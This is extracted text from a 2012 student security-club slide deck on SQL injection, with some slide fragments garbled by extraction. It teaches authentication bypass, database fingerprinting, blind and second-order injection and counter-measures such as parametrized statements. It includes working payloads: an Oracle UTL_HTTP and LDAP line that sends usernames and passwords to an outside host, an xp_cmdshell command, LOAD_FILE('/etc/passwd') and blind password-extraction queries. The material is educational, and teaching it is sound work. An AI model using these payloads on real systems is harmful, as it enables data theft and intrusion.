let me sql inject your heart! -...

•  Injection vulnerabilities are common for web applications. Some do target databases: « SQL injections ». The impact when exploiting such vulnerabilities rates from data retrieval, modifications, deletion till under certain case remote code execution!

•  Speakers: Franck De Goër, Fabien Duchene

Let me SQL inject your heart! SecurIMAG 2012-02-09

WARNING: SecurIMAG is a security club at Ensimag. Thoughts, ideas and opinions are not related to Ensimag. The authors assume no liability including for errors and omissions.

¡¡_ (in)security we trust _!!

SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012

Franck De Goër

2

-  Parcours : -  prépa PT à F. Buisson (VOIRON, 38) -  1è Année ENSIMAG

-  Objectifs : -  ISI -  thèse (?) -  enseignement-recherche

-  WHY Security? : Touche à toutes les branches de l'informatique, et multiples approches possibles pour un problème donné

  Introduction   Injection

  attacking datastores (XPath, LDAP, SQL)

  SQL language

  SQL injection   Definitions

  Fingerprinting (specificities: Oracle, MS SQL, MySQL)

  Some cool beef:   first order SQLi

  second order SQL injection   blind SQLi

  Automatic detection

  Counter-measures

  Conclusion

Outline

SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 3

« Security exploitation technique that permits injecting data and/or code »

Some injection examples:

Targeted system

In-memory executable

Web Server CGI-like application

Data-Stores

What can be injected?

Assembly instructions

Additional HTML nodes

Additional DATA and or COMMANDS

Vulnerabilities examples

Buffer Overflow

Cross site scripting (XSS)

SQL injection

Use-After-Free SVG injection XPATH injection

… … LDAP injection

Injection


For a given transition (HTTP request / HTTP REPLY) an injection is the ability to craft an input parameter, so that a subsystem not filtering enough that input parameter uses it for data or code.

Input parameters examples:

- User-Agent:

- HTTP METHOD: HEAD, GET…

Output examples:

- HTTP CONTENT

- HTTP-Only cookies

-  HTML code

Web injection - intuitively


- Relational databases. 1986. current: SQL3 (SQL99). SQL grammar

- language for:

-- interrogating: SELECT

-- data manipulation: UPDATE, INSERT, DELETE

-- data definition: CREATE, ALTER, DROP

-- data access control: GRANT, REVOKE

Database: francky-vincent

Table: accounts Table: news

id user password id date text

1 franck Ada.Text_Io 1 09-02-12 SQLi – F.De Goër – F. Duchene

2 securimag quarante-deux 2

... ...

field record

Structured Query Language


- interrogating a database: extract of the SQL grammar for the SELECT statement:

SELECT * FROM table WHERE cond

Eg: SELECT id FROM accounts WHERE user='franck' AND password='Ada.Text_Io'

Database: francky-vincent

Table: accounts Table: news

id user password id date text

1 franck Ada.Text_Io 1 09-02-12 SQLi – F.De Goër – F. Duchene

2 securimag quarante-deux 2

... ...

field record

SQL query example




  SQL language







  Conclusion

Outline


HTTP API

SQL

Eg: httpd+php

CGI

Eg: mysqld

Eg: mysql library

HTML HTTP

SQL injection – intuitively (1/4)


SQL Daemon HTTP client Eg: Browser

User input = a set of input parameters

The Web Application Hacker’s Handbook 2nd ed


HTML form:

HTTP Request:


Hidden.php (source code extract)

Some of the input parameters: GET - utilisateur=les blagues toto GET - motdepasse=sukZ! SQL Query (sent to the SQL driver via the SQL API): SELECT * FROM data WHERE user='les blagues toto' AND password='sukZ!'



Hidden.php (source code extract)

Some of the input parameters: GET - utilisateur=??? GET - motdepasse=????

-> Problem: how to bypass that authentication scheme?

SQL Query (sent to the SQL driver via the SQL API): SELECT * FROM data WHERE user='les blagues toto' AND password='sukZ!' OR 69=69 --'

SQL injection – intuitively - Franck DEMO

SQL injection – intuitively - Franck DEMO

Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008)

SQL injection – a formal definition (1/3)





Input parameter 1 Input parameter 2

Depending of how the web application developer did create his application:

- when we craft an input parameter, and the evaluated query is not conform wrt. SQL Grammar

-  ERROR and or EXCEPTION MIGHT BE raised … or catched!

-  SQL query that is sent to the SQL back-end is displayed

SQL injection with uncatched error / exception


Useful for:

- information gathering (part of a pentester’s job)

-- which SQL system is used? (software + version)

-- what is the SQL language version

-- what are the privileges the user does have

- stored procedures specific to an SQL server

- exploits specific to an SQL server version

Database system fingerprinting: WHY (1/4)


SecurIMAG -‐ =tle -‐ author -‐ date

DB \ impact HTTP, SMTP, TCP Requests

LDAP query! (11g)

Oracle SQL UTL_SMTP, UTL_HTTP UTL_TCP… toto’ || UTL_HTTP_REQUEST('irc.car-online.fr:80/'||(SELECT%20%username,password%FROM%data%WHERE 1))--

SYS.DBMS_LDAP.INIT('ldap.intranet:389',null) … SYS.DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.sub.car-online.fr',80)



DB \ impact

Remote command execution

Ability to write on the filesystem

Shutdown!!

MS-SQL Stored procedure: master..xp_cmdshell 'ipconfig /all > toto.txt'

SELECT * INTO OUTFILE '\\\\fqdn-server\\sharename\\output.txt' FROM users;

'shutdown --



DB \ impact Information disclosure Ability to write on the filesystem

MySQL SELECT LOAD_FILE('/etc/passwd')

SELECT * FROM data INTO OUTFILE '/tmp/wtf.txt'



DB \ impact

Causing a time delay

Database version

Current user privileges

Oracle UTL_HTTP.REQUEST('http://car-online.fr/time/10/')

SELECT banner FROM v$version

SELECT privilege FROM session_privs

MS-SQL WAITFOR DELAY '0:0:10'

SELECT @@version

SELECT grantee, table_name, privilege_type FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES

MySQL SLEEP(100) SELECT @@version

SELECT * FROM information_schema.user_privileges WHERE grantee = (SELECT user())

The Web Application Hacker’s Handbook 2nd ed

Database system fingerprinting: HOW -  try directly to inject parts of the previous SQL queries and check for

any output indicating that an error occurred. SOME EXAMPLES:


Database system fingerprinting: Franck DEMO

Database system fingerprinting: Franck DEMO

Blind SQL injection


Sometimes, when an SQL error is raised, the SQL query in NOT present in the webpage (HTML) output!

“Blind SQLi”

Idea: discriminate the result by observing a DIFFERENCE in the OUTPUT (HTML) when a part of the SQL query the attacker controls evaluates to FALSE or TRUE

Eg: … WHERE cond1 AND cond2

Attacker controlled

Blind SQLi: obtaing information on records

SELECT id, record1 FROM table WHERE id = '$existing_id' GROUP BY 2; --';

# return error if nb records < 2 # else return normal print

=> with several tests, possible to know the number of records To know record names, brutforce

SELECT id, record1 FROM table WHERE id = '$existing_id' GROUP BY password; //';

SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 25 25

Blind SQLi: obtaining the length of a password

For instance, if inputs are GET parameters :

http://vulnerable-web-site.com/script.php?id=1 AND

length(password)=$i

# return error if lenght(pass) != $i # else return normal print

=> by incrementing $i until normal print, we can know the length of the password


Blind SQLi: obtaining an integer value (1/5)

Blind SQLi: obtaining an integer value (3/)

Blind SQLi: obtaining the characters of a password

Get password characters

Clever brutforce

http://vulnerable-web-site.com/script.php?id=1 and substring(password,$i,1)=char($ascii_code)

# return error if the ith character isn't char($ascii_code) # else return normal print

=> by testing $ascii_code, we can know the ith password character


Blind SQLi – StalkR’s write-up for phplist SMPCTF 2010

From Blind SQL injection to local file inclusion! http://blog.stalkr.net/2010/07/smpctf-challenge-11-write-up-phplist.html#more

Where?

http://localhost/ex1/admin/?page=users&start=0&find=juanito&findby=email&sortby=0&sortorder=desc&id=0&find=juanito&findby=email

36

SQLi Query such as “SELECT field1, field2 FROM

table1 WHERE condition1 AND value2=[user_controlled_field]”

Filtering?

User controlled values? findby sortorder …

37

Interesting field for condition?

findby=email findby=1

same page output

38

findby=1

39

findby=1 AND 1 same page output! Nice start…

40

findby=1 AND 0

41

Blind SQLi discriminant

String present on the webpage when condition is evaluated to false

Eg: "Database error”

“You have an error”

..

42

Ex1 – Blind SQLi to LFI Requires FILE privilege LOAD_FILE Problem: filtering on quotes in the findby

parameter Hex encoded values

Findby=1 AND

substr(lpad(bin(ord(substr(load file(0x’+file.encode(’hex’)+’),’+str(charpos+1)+’,1))),8,0), ’+str(bitpos+1)+’ ,1)=1

43

StalkR script I did modify to take into account user-provided discriminant and that checks if the file does exist ensimag-student@bt:~/Desktop/ex1-script$ ./phplist_21012_sql_injection_local_file_disclosure.py

[*] phplist 2.10.12 SQL injection, local file disclosure

Usage: ./phplist_21012_sql_injection_local_file_disclosure.py <host> <path to phplist> <admin username> <admin password> <file to get> <discriminate_string_when_condition_evaluated_to_false>

44

From the server side: Observing if the user input controlled parameter is syntactically confined If not: this is a sufficient condition for saying it is an injection!

Automatic (and formal) detection




Automatic detection: sqlmap.py

-  client side -  Python script -  Ability to fingerprint various SQL back-ends:

http://sqlmap.sourceforge.net/doc/README.pdf


Automatic detection: sqlmap.py - DEMO

Franck DEMO


Counter-measures: Input filters

Input Filters: some developers assume that filtering the input is enough. Which is sometimes not the case.

!%^$#! This however does complicate the injection!

Filter examples:

- PHP : addslashes() injection will still work if query is like:

… WHERE integer_field=[USER_CONTROLLED_INPUT]


Input filters and Second Order SQL injections (1/2)

0. Filter: add a second quote 1. New user registration input1= meeraque' ; input2= Mj|_|@n|t0 INSERT INTO data (username,password) VALUES('meeraque''', ’Mj|_|@n|t0')

=> Record will contain meerauqe'


2. Change password: SELECT password FROM data WHERE username='meeraque'’

MySQL error! ERROR: Unclosed quote @ 42 STR: ’

3. Exploitation: 3.1 Register a user with username ' OR 1 in (SELECT password FROM data WHERE username='admeenistraore')

3.2. try to change the password P0wn3d! Admin password in the MySQL error message!

Input filters and Second Order SQL injections (2/2)

Counter-measures: parametrized statements


- PROBLEM: the SQL injection problem come from a not clear separation between DATA and COMMAND parts when building the SQL query

- parametrized statements:


Counter-measures: parametrized statements



  SQL language







  Conclusion

Outline

SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012 55 55

No questions please!


We have exhausted our knowledge… (and frankly, I feel more about starting the apero $

let me sql inject your heart! -...

Documents